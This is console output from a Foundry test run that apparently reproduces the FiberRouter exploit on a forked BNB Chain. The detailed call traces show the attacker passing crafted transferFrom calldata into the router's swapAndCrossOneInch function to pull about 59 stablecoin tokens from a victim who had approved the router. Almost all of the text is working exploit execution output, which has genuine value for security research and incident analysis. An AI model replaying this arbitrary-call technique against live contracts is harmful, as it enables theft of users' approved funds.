Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-11/FiberRouter_exp.sol:29:5:
   |
29 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 513.89ms (3.93ms CPU time)

Ran 1 test for src/test/2023-11/FiberRouter_exp.sol:ContractTest
[PASS] testExploit() (gas: 284042)
Logs:
  [Begin] Attacker USDC before exploit: 0.000000000000000000
  [Begin] Attacker USDT before exploit: 59.012161810470474620
  [End] Attacker USDC after exploit: 59.012161810470474620

Traces:
  [276230] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 33874498 [3.387e7])
    │   └─ ← [Return] 0
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c)
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000)
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    └─ ← [Stop]

  [334242] ContractTest::testExploit()
    ├─ [9796] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDC before exploit", val: 0, decimals: 18)
    ├─ [3296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a) [staticcall]
    │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a) [delegatecall]
    │   │   └─ ← [Return] 59012161810470474620 [5.901e19]
    │   └─ ← [Return] 59012161810470474620 [5.901e19]
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDT before exploit", val: 59012161810470474620 [5.901e19], decimals: 18)
    ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a) [staticcall]
    │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a) [delegatecall]
    │   │   └─ ← [Return] 59012161810470474620 [5.901e19]
    │   └─ ← [Return] 59012161810470474620 [5.901e19]
    ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 99999000000000000000000 [9.999e22])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 99999000000000000000000 [9.999e22])
    │   ├─  storage changes:
    │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0x00000000000000000000000000000000000000000000152cf4e72a974f1c0000
    │   └─ ← [Return] true
    ├─ [118225] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactETHForTokens{value: 100000000000}(1, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d], 0x4826e896E39DC96A8504588D21e9D44750435e2D, 1701135790 [1.701e9])
    │   ├─ [2893] 0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b::getReserves() [staticcall]
    │   │   └─ ← [Return] 578183375010609576632787 [5.781e23], 2539158567736215523912 [2.539e21], 1701135626 [1.701e9]
    │   ├─ [23974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 100000000000}()
    │   │   ├─ emit Deposit(dst: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 100000000000 [1e11])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x000000000000000000000000000000000000000000000000000000174876e800
    │   │   └─ ← [Stop]
    │   ├─ [8062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b, 100000000000 [1e11])
    │   │   ├─ emit Transfer(from: 0x10ED43C718714eb63d5aA57B78B54704E256024E, to: 0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b, value: 100000000000 [1e11])
    │   │   ├─  storage changes:
    │   │   │   @ 0x2f2061472082b519ca1a27145bcbc56e499e5d8d112879a998d42c4cfbac4874: 0x000000000000000000000000000000000000000000000089a5e7605142c2d248 → 0x000000000000000000000000000000000000000000000089a5e760688b39ba48
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x000000000000000000000000000000000000000000000000000000174876e800 → 0
    │   │   └─ ← [Return] true
    │   ├─ [65881] 0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b::swap(22713741626014 [2.271e13], 0, 0x4826e896E39DC96A8504588D21e9D44750435e2D, 0x)
    │   │   ├─ [30739] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transfer(0x4826e896E39DC96A8504588D21e9D44750435e2D, 22713741626014 [2.271e13])
    │   │   │   ├─ [29993] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transfer(0x4826e896E39DC96A8504588D21e9D44750435e2D, 22713741626014 [2.271e13]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b, to: 0x4826e896E39DC96A8504588D21e9D44750435e2D, value: 22713741626014 [2.271e13])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2ccd4d14e9e72d8ba00ee5337c9443c17dfa31d372125ff83be17ce5749d53b5: 0x000000000000000000000000000000000000000000007a6f62314156e88d61d3 → 0x000000000000000000000000000000000000000000007a6f62312cae740d1735
    │   │   │   │   │   @ 0x4fe34fbf4d1f370a34b0b1c34523ea22ec3d472f5089d5ddbabbcf123757cd26: 0 → 0x000000000000000000000000000000000000000000000000000014a874804a9e
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b) [staticcall]
    │   │   │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b) [delegatecall]
    │   │   │   │   └─ ← [Return] 578183374987895835006773 [5.781e23]
    │   │   │   └─ ← [Return] 578183374987895835006773 [5.781e23]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b) [staticcall]
    │   │   │   └─ ← [Return] 2539158567836215523912 [2.539e21]
    │   │   ├─ emit Sync(reserve0: 578183374987895835006773 [5.781e23], reserve1: 2539158567836215523912 [2.539e21])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 100000000000 [1e11], amount0Out: 22713741626014 [2.271e13], amount1Out: 0, to: 0x4826e896E39DC96A8504588D21e9D44750435e2D)
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x6565450a000000000089a5e7605142c2d248000000007a6f62314156e88d61d3 → 0x6565459a000000000089a5e760688b39ba48000000007a6f62312cae740d1735
    │   │   │   @ 9: 0x0000000000000000000000000000000407f8c4f5314e26762295de6e11199a65 → 0x0000000000000000000000000000000407f966d9aafbe90e0e20f7ff26da0755
    │   │   │   @ 10: 0x00000000000000000000000000067347633ea3279e4e9d7a76aadc531d732c7b → 0x00000000000000000000000000067347e3546650e5bd187d9d11d038b1e4e47b
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [100000000000 [1e11], 22713741626014 [2.271e13]]
    ├─ emit log_Data(data: 0x23b872dd0000000000000000000000004da35bf35504d77e5c5e9db6a35b76eb4479306a0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000332f55081bcf7137c)
    ├─ [123861] 0x4826e896E39DC96A8504588D21e9D44750435e2D::swapAndCrossOneInch(0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d, 0, 1, 43114 [4.311e4], 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 0, 0x23b872dd0000000000000000000000004da35bf35504d77e5c5e9db6a35b76eb4479306a0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000332f55081bcf7137c, 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d, 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d)
    │   ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x4826e896E39DC96A8504588D21e9D44750435e2D) [staticcall]
    │   │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x4826e896E39DC96A8504588D21e9D44750435e2D) [delegatecall]
    │   │   │   └─ ← [Return] 22713741626014 [2.271e13]
    │   │   └─ ← [Return] 22713741626014 [2.271e13]
    │   ├─ [8786] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4826e896E39DC96A8504588D21e9D44750435e2D, 0)
    │   │   ├─ [8034] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4826e896E39DC96A8504588D21e9D44750435e2D, 0) [delegatecall]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4826e896E39DC96A8504588D21e9D44750435e2D, value: 0)
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x4826e896E39DC96A8504588D21e9D44750435e2D, value: 0)
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x4826e896E39DC96A8504588D21e9D44750435e2D) [staticcall]
    │   │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x4826e896E39DC96A8504588D21e9D44750435e2D) [delegatecall]
    │   │   │   └─ ← [Return] 22713741626014 [2.271e13]
    │   │   └─ ← [Return] 22713741626014 [2.271e13]
    │   ├─ [5408] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::approve(0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d, 0)
    │   │   ├─ [4662] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::approve(0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d, 0) [delegatecall]
    │   │   │   ├─ emit Approval(owner: 0x4826e896E39DC96A8504588D21e9D44750435e2D, spender: 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d, value: 0)
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [25308] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::approve(0x6697fA48f7335F4D59655aA4910F517ec4109987, 1)
    │   │   ├─ [24562] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::approve(0x6697fA48f7335F4D59655aA4910F517ec4109987, 1) [delegatecall]
    │   │   │   ├─ emit Approval(owner: 0x4826e896E39DC96A8504588D21e9D44750435e2D, spender: 0x6697fA48f7335F4D59655aA4910F517ec4109987, value: 1)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x870582faca74ac11225b691511f60a30ecb97e225f149a97b2ab7e374bd876fb: 0 → 1
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [34286] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transferFrom(0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 59012161810470474620 [5.901e19])
    │   │   ├─ [33534] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transferFrom(0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 59012161810470474620 [5.901e19]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 59012161810470474620 [5.901e19])
    │   │   │   ├─ emit Approval(owner: 0x4da35bf35504D77e5C5E9Db6a35B76eB4479306a, spender: 0x4826e896E39DC96A8504588D21e9D44750435e2D, value: 115792089237316195423570985008687907853269984665640564039398471846102659165315 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x95b54eddf9dd9e09d2a2e9fc6c81f43ace4fd828283d6d4d3683f6b47c040713: 0x00000000000000000000000000000000000000000000000332f55081bcf7137c → 0
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000332f55081bcf7137c
    │   │   │   │   @ 0x4f48e4f9df0f8e073ac78016a93922404b3f259fefb51a196a760ecbd3372aee: 0xfffffffffffffffffffffffffffffffffffffffffffffffffe9cba87a275ffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffccba76a05e57eec83
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [27848] 0x6697fA48f7335F4D59655aA4910F517ec4109987::swapToAddress(0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d, 1, 43114 [4.311e4], 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E)
    │   │   ├─ [3296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x6697fA48f7335F4D59655aA4910F517ec4109987) [staticcall]
    │   │   │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x6697fA48f7335F4D59655aA4910F517ec4109987) [delegatecall]
    │   │   │   │   └─ ← [Return] 14718466380163179520 [1.471e19]
    │   │   │   └─ ← [Return] 14718466380163179520 [1.471e19]
    │   │   ├─ [9586] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transferFrom(0x4826e896E39DC96A8504588D21e9D44750435e2D, 0x6697fA48f7335F4D59655aA4910F517ec4109987, 1)
    │   │   │   ├─ [8834] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transferFrom(0x4826e896E39DC96A8504588D21e9D44750435e2D, 0x6697fA48f7335F4D59655aA4910F517ec4109987, 1) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0x4826e896E39DC96A8504588D21e9D44750435e2D, to: 0x6697fA48f7335F4D59655aA4910F517ec4109987, value: 1)
    │   │   │   │   ├─ emit Approval(owner: 0x4826e896E39DC96A8504588D21e9D44750435e2D, spender: 0x6697fA48f7335F4D59655aA4910F517ec4109987, value: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x294772522fbc092f76b239cb49a77761a024a332a19f89e89ef671273e3fef37: 0x000000000000000000000000000000000000000000000000cc427f30e427e400 → 0x000000000000000000000000000000000000000000000000cc427f30e427e401
    │   │   │   │   │   @ 0x870582faca74ac11225b691511f60a30ecb97e225f149a97b2ab7e374bd876fb: 1 → 0
    │   │   │   │   │   @ 0x4fe34fbf4d1f370a34b0b1c34523ea22ec3d472f5089d5ddbabbcf123757cd26: 0x000000000000000000000000000000000000000000000000000014a874804a9e → 0x000000000000000000000000000000000000000000000000000014a874804a9d
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x6697fA48f7335F4D59655aA4910F517ec4109987) [staticcall]
    │   │   │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x6697fA48f7335F4D59655aA4910F517ec4109987) [delegatecall]
    │   │   │   │   └─ ← [Return] 14718466380163179521 [1.471e19]
    │   │   │   └─ ← [Return] 14718466380163179521 [1.471e19]
    │   │   ├─  emit topic 0: 0x0752ea9a96cdaf45ba08b0e73e0bbecc3d4a19e96da74d1ac80edea784d4c62c
    │   │   │        topic 1: 0x0000000000000000000000008ac76a51cc950d9822d68b83fe1ad97b32cd580d
    │   │   │           data: 0x0000000000000000000000004826e896e39dc96a8504588d21e9d44750435e2d000000000000000000000000000000000000000000000000000000000000a86a000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e0000000000000000000000000000000000000000000000000000000000000001
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─  emit topic 0: 0x20bd279a6fcdf91b6b6adb80be0563b3410115638efdfad76619241075fa3dcc
    │   │           data: 0x0000000000000000000000008ac76a51cc950d9822d68b83fe1ad97b32cd580d000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e0000000000000000000000000000000000000000000000000000000000000038000000000000000000000000000000000000000000000000000000000000a86a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e0000000000000000000000000000000000000000000000000000000000000000
    │   ├─  storage changes:
    │   │   @ 0x4f48e4f9df0f8e073ac78016a93922404b3f259fefb51a196a760ecbd3372aee: 0xfffffffffffffffffffffffffffffffffffffffffffffffffe9cba87a275ffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffccba76a05e57eec83
    │   └─ ← [Stop]
    ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 59012161810470474620 [5.901e19]
    │   └─ ← [Return] 59012161810470474620 [5.901e19]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC after exploit", val: 59012161810470474620 [5.901e19], decimals: 18)
    ├─  storage changes:
    │   @ 0: 2 → 1
    │   @ 12: 0 → 1
    │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0x00000000000000000000000000000000000000000000152cf4e72a974f1c0000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.27s (7.29s CPU time)

Ran 2 test suites in 10.35s (9.79s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
